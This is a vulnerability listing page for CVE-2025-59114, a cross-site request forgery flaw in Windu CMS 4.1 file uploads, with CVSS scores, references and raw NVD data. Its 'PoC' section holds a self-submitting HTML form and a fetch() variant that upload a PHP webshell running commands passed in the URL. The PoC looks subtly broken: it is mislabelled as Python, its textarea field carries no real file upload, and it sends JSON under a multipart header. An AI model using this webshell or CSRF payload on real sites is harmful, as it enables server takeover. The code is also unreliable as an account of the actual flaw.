CVE-2025-59114

Description

Windu CMS is vulnerable to Cross-Site Request Forgery in file uploading functionality. Malicious attacker can craft special website, which when visited by the victim, will automatically send malicious file to the server. Only version 4.1 was tested and confirmed as vulnerable. This issue was fixed in version 4.1 build 2250.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:* - VULNERABLE

Windu CMS 4.1 < build 2250

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for Windu CMS File Upload -->
<!-- Save this as malicious.html and host on attacker server -->
<!DOCTYPE html>
<html>
<head>
    <title>Windu CMS CSRF Attack</title>
</head>
<body>
    <h1>Processing...</h1>
    <form id="csrfForm" action="http://target-site.com/index.php?controller=upload" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="qqfile" value="malicious.php">
        <input type="file" name="qqfile" style="display:none;">
        <textarea name="fileContent"><!-- Attacker's malicious file content -->
<?php
// Malicious webshell or payload
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
        </textarea>
    </form>
    <script>
        // Auto-submit form on page load
        document.getElementById('csrfForm').submit();
    </script>
</body>
</html>

<!-- Alternative PoC using fetch API -->
<script>
fetch('http://target-site.com/index.php?controller=upload', {
    method: 'POST',
    credentials: 'include',
    headers: {
        'Content-Type': 'multipart/form-data',
    },
    body: JSON.stringify({
        qqfile: 'malicious.php',
        fileContent: '<?php system($_GET["cmd"]); ?>'
    })
});
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59114
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59114
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59114/
[4] VulDB https://vuldb.com/cve/CVE-2025-59114
[5] https://cert.pl/posts/2025/11/CVE-2025-59110
[6] https://windu.org

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59114", "sourceIdentifier": "[email protected]", "published": "2025-11-18T15:16:33.717", "lastModified": "2025-12-05T13:16:03.910", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Windu CMS is vulnerable to Cross-Site Request Forgery in file uploading functionality. Malicious attacker can craft special website, which when visited by the victim, will automatically send malicious file to the server.\n\nOnly version 4.1 was tested and confirmed as vulnerable.\nThis issue was fixed in version 4.1 build 2250."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:windu:windu_cms:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "614EBC19-889B-4FC0-8937-C52F415D4835"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-59110", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://windu.org", "source": "[email protected]", "tags": ["Product"]}]}}